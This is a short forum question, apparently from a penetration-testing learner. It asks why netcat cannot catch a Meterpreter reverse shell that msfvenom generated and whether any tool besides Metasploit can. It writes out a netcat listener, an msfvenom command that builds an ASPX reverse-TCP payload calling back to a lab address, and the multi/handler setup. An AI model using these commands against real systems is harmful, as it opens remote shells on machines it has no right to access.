For most reverse shell here, I can simply use netcat to connect:
nc -nlvp 1234
But for reverse shell created by msfvenom, for example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx
I CANNOT use netcat to connect.
Instead, use msfconsole to connect:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Question:
Why netcat is NOT working here?
To connect reverse shell created by msfvenom, any other way than metasploit?